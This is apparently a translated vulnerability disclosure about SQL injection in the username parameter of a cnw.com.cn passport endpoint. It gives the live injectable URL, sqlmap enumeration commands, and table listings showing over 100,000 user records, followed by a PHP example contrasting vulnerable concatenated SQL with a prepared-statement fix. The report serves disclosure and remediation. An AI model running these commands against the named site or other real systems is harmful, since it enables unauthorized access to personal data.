SQL injection on a 网界网 (cnw.com.cn) sub-site (over a hundred thousand user records)
Injection point:
http://passport.cnw.com.cn/findusername.php?username=crtest1
The username parameter of this endpoint is vulnerable to SQL injection.
sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --dbs --current-user --current-db
sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --count
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| userauditlogs | 264429 |
| users | 128142 |
| users2 | 127382 |
| laiyuan | 30618 |
| bjjt_login | 20666 |
| xdd_answer | 19526 |
| bjjt_dc | 14017 |
| sg_qdetial | 13698 |
| rel_usermail | 9077 |
| rel_usermail_20131206 | 8858 |
| sg_role | 4055 |
| t4 | 2862 |
| bjjt_reg | 1643 |
| urlvisitrecords | 1332 |
| intel121112 | 819 |
| bjjt1 | 649 |
| t3 | 275 |
| t1 | 184 |
| unsub_fb | 162 |
| sg1 | 138 |
| informatica | 101 |
| rel_othermail | 54 |
| sg_que | 45 |
| wy_industry | 35 |
| wy_duty | 20 |
| sg_roleitem | 18 |
| bjjtcourse | 15 |
| murlinfos | 12 |
| mailtypes | 10 |
| wy_companysize | 7 |
| wy_Turnover | 7 |
| sg_final_fight | 6 |
| wy_Pcsize | 6 |
| wy_serversize | 6 |
| bjjtcoursecate | 2 |
| bjjtadmin | 1 |
| sg_num | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 959 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| TABLES | 76 |
| STATISTICS | 69 |
| KEY_COLUMN_USAGE | 54 |
| TABLE_CONSTRAINTS | 54 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 30 |
| SCHEMATA | 4 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: ccw_passport
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| users | 19 |
+---------------------------------------+---------+
Database: cnwprojects
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| answer2 | 9665739 |
| answer | 32107 |
| users | 3573 |
| 20090609_cisco | 2055 |
| 20090605_ibm | 867 |
| news_content | 461 |
| 20090424_juniper | 447 |
| 20090311_symantec_records | 403 |
| 20090608_arrayamp | 235 |
| 20090309_symantec | 97 |
| question | 97 |
| newsletter | 26 |
| 20090506_novell | 15 |
| manswer | 13 |
| project | 12 |
| fuzeren | 8 |
| mquestion | 6 |
| meeting | 5 |
| musers | 2 |
+---------------------------------------+---------+
Fix recommendation:
This was a security test; I absolutely did not dump the database. Please fix it quickly. I cannot guarantee that other black-hat hackers will not do something malicious; after all, I am no hacking guru and cannot help you make it secure on all fronts.
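The report gives no code for the fix, so the following is an added example, not the site's actual findusername.php (whose source is not in the report). It contrasts the lookup pattern that produces exactly the weakness sqlmap detected on the username parameter with a hardened version using a PDO prepared statement. The table and column names (users, username), the database name ccw_passport, the DSN and the credentials are assumptions taken from or modelled on the report's table listing.

```php
<?php
// Added example, not the real findusername.php. Assumed schema: table `users`
// with a `username` column in database `ccw_passport`. Connection details are
// placeholders.
declare(strict_types=1);

// --- Vulnerable pattern: the request parameter is spliced into the SQL text. ---
// Any quote or comment character in $username becomes part of the statement,
// so the server executes attacker-controlled SQL; this is the condition that
// lets a tool such as sqlmap enumerate every database the account can read.
function findUsernameVulnerable(PDO $db, string $username): bool
{
    $sql = "SELECT 1 FROM users WHERE username = '" . $username . "' LIMIT 1";
    $row = $db->query($sql)->fetch();
    return $row !== false;
}

// --- Hardened pattern: prepared statement with a bound parameter. ---
// The username is sent to the server as data, separate from the SQL text, so
// its content can never change the query's structure.
function findUsernameSafe(PDO $db, string $username): bool
{
    // Reject anything that does not look like a username before touching the DB.
    // This is defence in depth; the prepared statement alone already prevents injection.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $username)) {
        return false;
    }
    $stmt = $db->prepare('SELECT 1 FROM users WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $username]);
    return $stmt->fetchColumn() !== false;
}

// Placeholder connection; a real deployment reads these values from config,
// and the account should hold SELECT on the needed tables only, so that even
// a future injection bug cannot read other databases or system tables.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=ccw_passport;charset=utf8mb4',
    'app_user',      // placeholder
    'app_password',  // placeholder
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // use server-side prepared statements
    ]
);

$username = (string)($_GET['username'] ?? '');

// Answer with a bare yes/no. Database errors are logged server-side and never
// echoed to the client, which removes the error-based feedback channel that
// makes blind enumeration fast.
header('Content-Type: application/json');
try {
    echo json_encode(['exists' => findUsernameSafe($db, $username)]);
} catch (PDOException $e) {
    error_log('findusername lookup failed: ' . $e->getMessage());
    http_response_code(500);
    echo json_encode(['exists' => false]);
}
```

Two details worth checking after deploying such a change: the `--current-user` and information_schema output in the report show the web application's database account could read several unrelated databases, so restricting that account's privileges is part of the fix, and an endpoint like this should be rate limited, since even a correctly parameterised username-existence check still lets a caller enumerate valid accounts one request at a time.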